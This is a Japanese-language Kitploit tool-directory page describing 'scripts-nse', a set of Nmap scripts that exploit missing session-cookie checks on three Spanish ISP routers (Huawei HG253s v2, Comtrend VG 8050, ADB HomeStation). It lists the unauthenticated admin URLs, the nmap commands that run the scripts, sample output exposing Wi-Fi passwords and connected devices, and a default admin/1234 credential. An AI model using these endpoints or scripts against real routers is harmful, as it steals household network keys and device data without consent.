Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
scripts-nse — ルーターから情報を検索するためのNSEスクリプト集 | Kitploit
ツール/GitHubGitHub/danilabs/scripts-nse
偵察脆弱性スキャナーエクスプロイト情報収集ウェブセキュリティネットワークセキュリティペネトレーションテスト
GitHubdanilabs/scripts-nse

scripts-nse

ルーターから情報を検索するためのNSEスクリプト集

リポジトリを見る
362610年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

これは何ですか?

ルーターから情報を検索するためのNSEスクリプトです。

このスクリプトの作者はVicenDominguezです。彼はHuaweiの0-Dayを発見しました。私は他の2つのルーター向けに修正しただけです。

このスクリプトの作者は、その使用について一切責任を負いません。

#Huawei HG253s v2 スペインのVodafoneは、スペインの顧客向けに新しいHuawei HG253v2ルーターのレンタルを開始しています。この新しいルーターには新しいファームウェアバージョンが搭載されています。

##脆弱性 基本的に、一部の管理WebページでセッションCookieを検証していません。 そのため、インターネットに公開されている任意のルーターで、これらのURLから直接情報を取得することが可能です。

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##使用方法

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 スペインのTelefonicaは、スペインの顧客向けに新しいComtrend VG 8050ルーターのレンタルを開始しています。この新しいルーターには新しいファームウェアバージョンが搭載されています。 このバグはDaniLabsによって発見されました。

##脆弱性 基本的に、一部の管理WebページでセッションCookieを検証していません。 そのため、インターネットに公開されている任意のルーターで、これらのURLから直接情報を取得することが可能です。

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##使用方法

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N a.k.a HomeStation スペインのTelefonicaは、スペインの顧客向けに新しいADB P.DGA4001Nルーターのレンタルを開始しています。この新しいルーターには新しいファームウェアバージョンが搭載されています。 このバグはDaniLabsによって発見されました。

##脆弱性 基本的に、一部の管理WebページでセッションCookieを検証していません。 そのため、インターネットに公開されている任意のルーターで、これらのURLから直接情報を取得することが可能です。

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

デフォルトの認証情報は admin / 1234 です。 ##使用方法

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

ツールをダウンロード